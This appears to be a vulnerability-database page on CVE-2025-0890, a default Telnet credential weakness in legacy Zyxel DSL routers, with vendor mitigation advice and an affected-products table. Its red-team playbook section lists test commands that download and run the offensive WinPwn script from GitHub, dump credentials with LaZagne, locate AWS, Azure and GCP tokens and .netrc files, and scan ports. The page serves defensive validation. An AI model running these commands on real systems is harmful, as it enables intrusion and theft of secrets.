CVE-2025-0890
Overview
This vulnerability is an authentication weakness caused by the presence of insecure default credentials in the Telnet management interface of Zyxel VMG4325-B10A firmware version 1.00(AAFR.4)C0_20170615. The root cause is the failure to enforce credential changes on initial setup, leaving default login details active. The affected component is the legacy DSL CPE device's Telnet service, which accepts administrative access without credential validation beyond the default values.
Vulnerability Description
**UNSUPPORTED WHEN ASSIGNED** Insecure default credentials for the Telnet function in the legacy DSL CPE Zyxel VMG4325-B10A firmware version 1.00(AAFR.4)C0_20170615 could allow an attacker to log in to the management interface if the administrators have the option to change the default credentials but fail to do so.
Impact
An unauthenticated attacker with network access to the device's Telnet port can log into the management interface using default credentials, gaining full administrative control. This enables the attacker to modify device settings, disrupt service, or pivot within the network. No user interaction or prior authentication is required (CVSS vector AV:N/AC:L/PR:N/UI:N). The high severity is due to the potential for complete compromise of the affected device and associated network infrastructure.
Solution
Zyxel has issued a security advisory addressing this vulnerability for affected legacy DSL CPE devices, including VMG4325-B10A firmware 1.00(AAFR.4)C0_20170615. Administrators should apply the vendor-released firmware updates as detailed in the advisory at https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-and-insecure-default-credentials-vulnerabilities-in-certain-legacy-dsl-cpe-02-04-2025. The advisory provides specific patch versions and instructions to disable or change default Telnet credentials to mitigate unauthorized access.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with insecure default credentials in the Telnet function of specific Zyxel DSL CPE firmware versions presents a significant security risk. This issue arises when devices are shipped with factory-set login credentials that are widely known and not adequately protected. The Telnet protocol, which is inherently insecure due to its lack of encryption, allows unauthorized users to gain access to the management interface of the affected devices if administrators neglect to change these default settings. This oversight can lead to unauthorized access, enabling attackers to manipulate device configurations, intercept traffic, or even launch further attacks on the network.
Attack vectors exploiting this vulnerability are straightforward and can be executed with minimal technical skill. An attacker could scan for devices using the Telnet protocol on common ports, identify those with default credentials, and gain access to the management interface. Once inside, they could alter settings, disable security features, or deploy malware. Furthermore, the presence of such devices on a network can serve as a foothold for lateral movement, allowing attackers to pivot to other systems or escalate privileges within the network. Given the prevalence of these devices in both residential and small business environments, the potential for widespread exploitation is alarming.
The real-world impact of this vulnerability can be severe, particularly for businesses that rely on these devices for their internet connectivity and network management. Unauthorized access can lead to data breaches, loss of sensitive information, and significant operational disruptions. Additionally, compromised devices can be used as part of a botnet for Distributed Denial of Service (DDoS) attacks, further amplifying the risk. The financial implications can be substantial, including costs associated with incident response, regulatory fines, and reputational damage. For organizations that handle sensitive data or operate in regulated industries, the consequences of such a breach could be catastrophic.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular network scans can help identify devices using default credentials, while configuration management practices should ensure that all devices are hardened according to security best practices. Organizations should enforce policies that mandate changing default credentials upon deployment and regularly review device configurations for compliance. Additionally, it is advisable to disable Telnet in favor of more secure protocols, such as SSH, which provide encrypted communication channels. Employing intrusion detection systems can also help monitor for unauthorized access attempts, allowing for timely responses to potential threats.
In conclusion, the vulnerability associated with insecure default credentials in Zyxel DSL CPE firmware poses a critical threat to network security. The ease of exploitation, coupled with the potential for significant real-world impact, underscores the importance of proactive security measures. Organizations must prioritize the hardening of their network devices and adopt comprehensive security policies to mitigate risks associated with this and similar vulnerabilities. By doing so, they can better protect their assets and maintain the integrity of their operations in an increasingly hostile cyber landscape.
Affected Products (15)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zyxel | Vmg4325-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg4325-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Sbg3500-N000 Firmware | N/A |
cpe:2.3:o:zyxel:sbg3500-n000_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg1312-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg1312-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg1312-B10b Firmware | N/A |
cpe:2.3:o:zyxel:vmg1312-b10b_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg1312-B10e Firmware | N/A |
cpe:2.3:o:zyxel:vmg1312-b10e_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3312-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg3312-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3313-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg3313-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3926-B10b Firmware | N/A |
cpe:2.3:o:zyxel:vmg3926-b10b_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg4325-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg4325-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg4380-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg4380-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg8324-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg8324-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg8924-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg8924-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Sbg3300-N000 Firmware | N/A |
cpe:2.3:o:zyxel:sbg3300-n000_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Sbg3300-Nb00 Firmware | N/A |
cpe:2.3:o:zyxel:sbg3300-nb00_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Sbg3500-Nb00 Firmware | N/A |
cpe:2.3:o:zyxel:sbg3500-nb00_firmware:-:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-0890 |
| zyxel.com |
GitHub CVE
vendor-advisory
|
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-and-insecure-default-credentials-vulnerabilities-in-certain-legacy-dsl-cpe-02-04-2025 |